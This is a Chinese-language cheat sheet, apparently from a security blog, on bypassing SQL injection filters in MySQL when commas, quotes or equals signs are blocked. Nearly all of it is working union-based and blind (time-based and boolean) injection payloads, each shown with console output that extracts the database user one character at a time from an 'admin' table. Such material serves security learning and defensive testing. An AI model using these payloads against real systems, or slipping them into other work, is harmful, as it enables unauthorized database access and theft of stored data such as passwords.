oxo1 逗号被过滤
1)联合注入
union select * from(select 1)a join (select 2)b
mysql> select * from admin where id=-1 union select * from(select 1)a join (select 2)b;
+----+-----+
| id | pwd |
+----+-----+
| 1 | 2 |
+----+-----+
1 row in set (0.00 sec)mysql> select * from admin where id=-1 union select * from(select user())a join (select 2)b;
+----------------+-----+
| id | pwd |
+----------------+-----+
| root@localhost | 2 |
+----------------+-----+
1 row in set (0.00 sec)
2)盲注
case when...then...else...end + from...for...
case when(substring(user() from 1 for 1)='r') then sleep(3) else 0 end
mysql> select * from admin where id=1 and case when(substring(user() from 1 for 1)='r') then sleep(3) else 0 end;
Empty set (3.00 sec)mysql> select * from admin where id=1 and case when(substring(user() from 1 for 1)='o') then sleep(3) else 0 end;
Empty set (0.00 sec)
布尔盲注只要把 sleep(3) 改成 then 1 else 0 就好了
Payload 2
and (select 1 from(select substring((user()) from 1 for 1)='r' and sleep(3))x)
mysql> select * from admin where id=1 and (select 1 from(select substring((user()) from 1 for 1)='r' and sleep(3))x) ;
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (3.00 sec)mysql> select * from admin where id=1 and (select 1 from(select substring((user()) from 1 for 1)='o' and sleep(3))x) ;
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)
3)limit 中逗号被过滤
LIMIT 语法:limit 0,1 == limit 1 offset 0
mysql> select pwd from admin limit 1 offset 0;
+-------+
| pwd |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)mysql> select pwd from admin limit 1 offset 1;
+------+
| pwd |
+------+
| test |
+------+
1 row in set (0.00 sec)
like
mysql> select * from admin where id=1 and if(mid(user(),1,1) like 'r',1,0);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)mysql> select * from admin where id=1 and if(mid(user(),1,1) like 'a',1,0);
Empty set (0.00 sec)
regexp
mysql> select * from admin where id=1 and if(mid(user(),1,1) regexp 'r',1,0);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)mysql> select * from admin where id=1 and if(mid(user(),1,1) regexp 'a',1,0);
Empty set (0.00 sec)
between ... and ...
mysql> select * from admin where id=1 and if(mid(user(),1,1) between 'r' and 'r',1,0);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)mysql> select * from admin where id=1 and if(mid(user(),1,1) between 'r' and 'a',1,0);
Empty set (0.00 sec)
rlike
mysql> select * from admin where id=1 and if(mid(user(),1,1) rlike 'r',1,0);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)mysql> select * from admin where id=1 and if(mid(user(),1,1) rlike 'a',1,0);
Empty set (0.00 sec)
locate
mysql> select * from admin where id=1 and if(locate('r',substr(user(),1,1))>0,1,0);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)mysql> select * from admin where id=1 and if(locate('a',substr(user(),1,1))>0,1,0);
Empty set (0.00 sec)
position
mysql> select * from admin where id=1 and if(position('root' in substr(user(),1,4))>0,1,0);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)mysql> select * from admin where id=1 and if(position('xxxx' in substr(user(),1,4))>0,1,0);
Empty set (0.00 sec)
instr
mysql> select * from admin where id=1 and if(instr(substr(user(),1,4),'root')>0,1,0);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)mysql> select * from admin where id=1 and if(instr(substr(user(),1,4),'xxxx')>0,1,0);
Empty set (0.00 sec)
ascii
and if(ascii(substr(user(),1,1))=114,sleep(3),1)
mysql> select * from admin where id=1 and if(ascii(substr(user(),1,1))=114,sleep(3),1);
Empty set (3.00 sec)mysql> select * from admin where id=1 and if(ascii(substr(user(),1,1))=115,sleep(3),1);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)
无逗号、无单双引号
and case when(ascii(substring(user() from 1 for 1))=114) then 1 else 0 end
mysql> select * from admin where id=1 and case when(ascii(substring(user() from 1 for 1))=114) then 1 else 0 end;
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)mysql> select * from admin where id=1 and case when(ascii(substring(user() from 1 for 1))=115) then 1 else 0 end;
Empty set (0.00 sec)
无逗号、无单双引号、无等号
and case when(ascii(substring(user() from 1 for 1)) like 114) then sleep(3) else 0 end
mysql> select * from admin where id=1 and case when(ascii(substring(user() from 1 for 1)) like 114) then sleep(3) else 0 end;
Empty set (3.00 sec)mysql> select * from admin where id=1 and case when(ascii(substring(user() from 1 for 1)) like 115) then sleep(3) else 0 end;
Empty set (0.00 sec)
更多有兴趣的组合等着你自己去发现了、绝大部分的内容都来自下方参考链接、该师傅写得非常好、有兴趣的可以去围观围观吧。如有侵权、请联系删除。
参考:https://xz.aliyun.com/t/5505